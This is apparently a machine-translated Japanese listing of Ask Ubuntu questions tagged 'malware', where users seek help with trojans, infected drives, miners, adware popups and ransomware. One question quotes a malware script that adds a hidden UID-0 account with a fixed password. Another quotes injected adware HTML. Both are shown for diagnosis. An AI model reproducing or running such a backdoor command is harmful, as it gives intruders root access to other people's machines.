タグ付けされた質問 「malware」

悪意のあるソフトウェアに関する質問

5
Linuxトロイの木馬を検出して削除する方法
私は最近これに(再)つまずきました:Linuxトロイの木馬はほぼ1年間見過ごされています(Unreal IRCd) はい、信頼できないソースからランダムなPPA /ソフトウェアを追加すると、トラブル(またはそれ以上)を要求することを知っています。私はそれを決してしませんが、多くのことを行います(多くのLinuxブログやタブロイドは、システムを壊したり、さらに悪いことにセキュリティを損なう可能性があることを警告せずに、派手なアプリにPPAを追加することを促進しています)。 トロイの木馬または不正なアプリケーション/スクリプトを検出して削除するにはどうすればよいですか?
16 security  malware 

2
「Ubuntuアプリ」がGoogleアカウントにフルアクセスできるのはなぜですか?
同じ(または同様の)トピックは、先ほどAsk Ubuntuで既に取り上げました。 Ubuntu 17.04 Chromium BrowserはGoogleアカウントへのフルアクセスを静かに提供します Ubuntu 16.04の新しいクリーンインストールを実行しました。驚いたことに、「Ubuntuアプリ」は表示されたままで、Googleアカウントに完全にアクセスできます。理由はわかりませんが、とてもイライラします。これは何ですか?私は「Ubuntu」にそのような許可を与えていません。 悪意のあるコードかもしれませんか?この悪意のあるコードは、私がインストールしたChromium拡張機能の一部に由来している可能性があります。 ターミナルを使用してChromiumをインストールしました。 sudo apt-get install chromium-browser スクリーンショット:Googleアカウント->サードパーティアプリ-> Ubuntu また、Ubuntu URLは「http://」であり、公式の「https://」ではありません。

2
ウイルスに感染したフラッシュドライブからRECYCLERディレクトリを削除する
ファイルを保存し、gpartedを使用してドライブをフォーマットするオプションについてアドバイスする前に、その数時間前に行うことができ、数分しかかからなかったことを理解してください。実際、ここで実際に何が起こっているのかを理解したいと思います。この状況は、長年にわたって得た私のすべての経験を破壊しています。 ウイルスに感染したフラッシュドライブをUbuntuマシンに挿入したら、ウイルスファイルを削除するだけでいいという印象を受けました。 今日、私は、Windowsマシンがウイルスに感染していることを完全に知っているWindowsマシンから、NTFSフォーマットのフラッシュドライブにいくつかのファイルを収集しました。フラッシュドライブをマシンに挿入すると、実際に多くのファイルとフォルダーが収集されていることがわかりました。それらのほとんどを削除しました。ハードレジスタンスを示すのは、RECYCLERディレクトリ(およびそのサブディレクトリ)のみです。 このディレクトリの属性。 drwx------ 1 masroor masroor 4.0K May 7 16:01 RECYCLER/ rmコマンドを実行すると、 sudo rm -rvf RECYCLER/ 次の行で長い出力が得られます。 rm: cannot remove `RECYCLER/S-2-4-27-3777257131-1806073332-421880436-8537/OagFrAIX.exe': Input/output error rm: cannot remove `RECYCLER/S-2-4-27-3777257131-1806073332-421880436-8537/viJbcvrJ.cpl': Input/output error <rest snipped> 興味深いことに、上記の報告されたファイルはls、無数の属性セットを持つコマンドによって表示されます。 ls -l RECYCLER/S-2-4-27-3777257131-1806073332-421880436-8537/ ls: cannot access RECYCLER/S-2-4-27-3777257131-1806073332-421880436-8537/OagFrAIX.exe: Input/output error ls: cannot access RECYCLER/S-2-4-27-3777257131-1806073332-421880436-8537/viJbcvrJ.cpl: Input/output error total …

3
ClamAV:freshclamがハングし、100%CPUを使用します
を実行してClamAVデータベースを更新しようとしましたfreshclam。daily-*.cdiff正常にダウンロードされ、その後、プロセスがハングしています。CPUは100%で最大になりますが、更新は完了しません。Ctrl+でプロセスをキャンセルしましたC承認後に。10分。更新試行の出力は次のとおりです。 # freshclam ClamAV update process started at Tue Nov 8 00:15:57 2016 main.cvd is up to date (version: 57, sigs: 4218790, f-level: 60, builder: amishhammer) Downloading daily-22474.cdiff [100%] 他の誰かがこの動作を観察しましたか?バグですか、システムが適切に構成されていませんか? PS:ClamAV v0.99.2Ubuntu Mate 16.04で使用しています。

3
Ubuntuはマルウェアサイトに対して脆弱ですか?
「攻撃サイト」としてフラグが付けられた、またはマルウェアのあるサイトを閲覧したばかりですが、Firefoxはそのサイトに入る前に警告しませんでした。サイトの別のページで新しいタブを開いたときにのみ、ページがブロックされました。 Ubuntuに使用できるマルウェア対策がないと思うので、システムの脆弱性を確認するにはどうすればよいですか?あれば、教えてください。 ありがとう!
14 security  malware 

5
Ubuntuのcrond64 / tsmウイルス
最近、ホームサーバーが非常に遅くなることに気付きました。すべてのリソースは、2つのプロセスによって食い尽くされた:crond64とtsm。私は彼らを繰り返し殺しましたが、彼らは何度も現れ続けました。 同時に、私のISPは私のIPアドレスからの不正行為について私に通知していました。 ==================== Excerpt from log for 178.22.105.xxx==================== Note: Local timezone is +0100 (CET) Jan 28 20:55:44 shared06 sshd[26722]: Invalid user admin from 178.22.105.xxx Jan 28 20:55:44 shared06 sshd[26722]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=178.22.105.xxx Jan 28 20:55:45 shared06 sshd[26722]: Failed password for invalid user admin from …

2
「〜/ .wineはあなたのものではありません」、私は安全ですか?
そのため、sudoを使用して管理者権限を取得するという提案があったときに、ワインに何かをインストールしようとしていました。それは私が上記のメッセージを受け取ったときです ~/.wine is not owned by you 読んでみると、なぜこのメッセージが表示されるのか、そしてsudoワインを飲もうとするのは本当に悪い考えだということにすぐに気付きました。 だから私はこれ以上何もせず、sudo二度とワインを飲むつもりはありません。私の質問は、このブロックを受け取ったので、安全ですか?または、ワインをすべて削除する必要がありますか?
12 wine  sudo  security  malware 

1
ラップトップでマルウェアに対処する方法は?
Ubuntu 13.10ラップトップが何らかのマルウェアに感染していることはかなり確信しています。 時々、プロセス/ lib / sshd(rootが所有)が実行され、CPUを大量に消費しているのを見つけます。/ usr / sbin / sshdを実行するのはsshdサーバーではありません。 バイナリには--wxrw-rwt権限があり、/ libディレクトリにスクリプトを生成および生成します。最近のものは13959730401387633604という名前で、次のことを行います #!/bin/sh exec 1>/dev/null exec 2>/dev/null useradd -g 0 -u 0 -o gusr echo gusr:chaonimabi123456123 | chpasswd gusrユーザーはマルウェアによって独自に作成された後、100%のCPUを消費しながらchpasswdがハングします。 これまでのところ、/ etc /のファイルにgusrユーザーが追加されたことを確認しました。 /etc/group /etc/gshadow /etc/passwd /etc/shadow /etc/subgid /etc/subuid マルウェアは、これらすべてのファイルのコピーに「-」という接尾辞を付けたようです。ルートによって変更された/ etc /ファイルの完全なリストは、ここから入手できます。 さらに、/ etc / hostsファイルがthisに変更されました。 / lib / sshdは、/ …
12 security  malware 

3
悪意のあるメールを受信しましたが、安全であることをどのように確認しますか?
Gmailにログインし、Amazonから最近の注文の評価についてメールを受け取りました。私は会社を認識していませんでしたが、メールを開くことにしましたが、それがすぐにAmazonからのものではなく、ランダムなものが多く、誰かが何かを悪用しようとしている「悪い」メールのように見えました。 私は16.04にいます。私はいつもUbuntuを読んでいます。すべてのルートが必要なため、かなり安全です。現在システムに何もないことを確認するために実行する必要のあるソフトウェアや、安全であることを確認するために実行する必要があるソフトウェアはありますか?私は通常メールに注意しますが、これは私を取りました。
10 security  malware 

5
Ubuntuでウイルスを作成するために使用されているファイル形式は何ですか?[閉まっている]
休業。この質問には、より焦点を当てる必要があります。現在、回答を受け付けていません。 この質問を改善してみませんか?質問を更新して、この投稿を編集するだけで1つの問題に焦点を当てます。 3年前休業。 Ubuntuでウイルスを作成するために使用されているファイル形式は何ですか?たとえば、ほとんどのWindowsウイルスは.exeフォーマットで記述されていますが、Ubuntuでは通常のフォーマットを特定できません。
9 malware 

2
Ubuntuはランサムウェアの暗号化に対してどのように(非)脆弱性がありますか?
編集:これは推奨される複製とは異なります。推奨される複製は、ウイルスとアンチウイルス全般に関するものです。この質問は、暗号化ランサムウェア、その実行方法、および暗号化されたフォルダーに影響するかどうかについて具体的に質問されます。 最近では、悪意のあるソフトウェアがWindowsコンピュータに感染し、意志に反してデータを暗号化し、暗号化キーと引き換えにビットコインの身代金を要求しています。 Linux用のランサムウェアを誰もコーディングする可能性は低いと思いますが、誰かがそうしたとしましょう。 このようなソフトウェアをUbuntuマシンで「正常に」実行するには、ユーザーはまずそれを実行してsudoパスワードを入力する必要がありますか?このような脅威は、ユーザーがこれを行わなくてもUbuntuで考えられますか? ユーザーのファイルがすでに暗号化されている場合、それはこれに対して保護されますか?ランサムウェアプログラムが、(sudoパスワードで確認された)ユーザーによって知らずにインストールされた場合、暗号化されたデータを人質に取られる可能性はありますか? 一般に、Ubuntuは暗号化ランサムウェアに対してどのように(非)脆弱性があり、実際にユーザーのデータを人質に取られるようにするために、ユーザーのアクションはどれほど不注意/不慣れである必要がありますか?
9 malware 

6
ChromeとFirefoxの両方でポップアップ広告ウイルス
開いているサイトに関係なく、ポップアップ広告ボックスが表示されます。設定のリセット、拡張機能の無効化、Chrome上のすべてのユーザーの削除を試みました。 私が以前に開いたこともなかったFirefoxでも同じことが起こるので、それはクロムについてではないようです。 最近追加したリポジトリと関係があるのではないかと思います。 十分な評判がないため画像をアップロードできないため、ポップアップについて説明します。ページの中央に配置され、それほど大きくありません。ページの他の部分と一緒に移動せず、ページをスクロールしている間はそのままです。中には時々グーグル広告があります。AdBlockはコンテンツをブロックしますが、ポップアップ自体はブロックしません。 検査要素の結果: <div id="thisisonesplashforclicktocloseidhere" style= "position:fixed;z-index:999900;top:50%;left:50%;margin-top:-125px;margin-left:-150px;width:300px;height:250px;background-color:#fff;border:4px solid #444;-moz-box-shadow:0 0 12px 4px #888;-webkit-box-shadow:0 0 12px 4px #888;box-shadow:0 0 12px 4px #888;-webkit-border-radius:4px;border-radius:4px;"> <iframe frameborder="0" height="0" scrolling="no" src= "http://guzelyemek.com/reklam.html?gads_300x250" style= "display: none !important; visibility: hidden !important; opacity: 0 !important;" width="0"></iframe><a href="javascript:hideADSnow()" id="clickonME" style= "position:absolute;top:-8px;right:-7px;display:block;width:29px;height:29px;background:transparent url(http://3.bp.blogspot.com/-2pNyEIhTbiU/UWJ-FMsZktI/AAAAAAAAUKg/3FPcPp0CNko/s1600/close-button.png) no-repeat top left;"></a> chrome://plugins: 注: …

1
ユーザーアカウントまたはゲストアカウント内のウイルスまたはマルウェアはUbuntuシステム全体に影響しますか?
私がLinuxを使い始めたとき、Linuxシステムのファイル構造とアクセス許可を研究しているときに、自分の考えが定式化されました。これは、権限の低いまたは制限されたアカウント内でのみ操作する限り、ウイルスやマルウェアが侵入することはないということです。アカウントはシステム全体に影響します。設定と保存されたドキュメントはすべてアカウントに排他的に保存されるため、インストールされているさまざまなアプリケーションに「それ」が影響することはありません...または、これは間違っていますか? これに関して、Ubuntuの「sudo」コマンドに懸念があります。端末を使用して特権アカウントでsudoを使用した場合、感染していないユーザーまたはゲストアカウントの内部から、感染したユーザーのホームフォルダーからのマルウェアがシステム全体に浸透し、Ubuntuシステムを感染させますか? また、Windowsエミュレーター、Wine ...をインストールしたアプリケーションはシステム全体ではなく、インストール時に使用していたアカウントにローカライズされていることに気付きました。残念ながら、ワインアプリケーションはマルウェアの磁石です。ClamTKは1週間以内に700以上の脅威を検出しました。この脅威が出てシステム全体に感染することを心配する必要がありますか? これに光を当てることができた人々に前もって感謝します。
弊社のサイトを使用することにより、あなたは弊社のクッキーポリシーおよびプライバシーポリシーを読み、理解したものとみなされます。
Licensed under cc by-sa 3.0 with attribution required.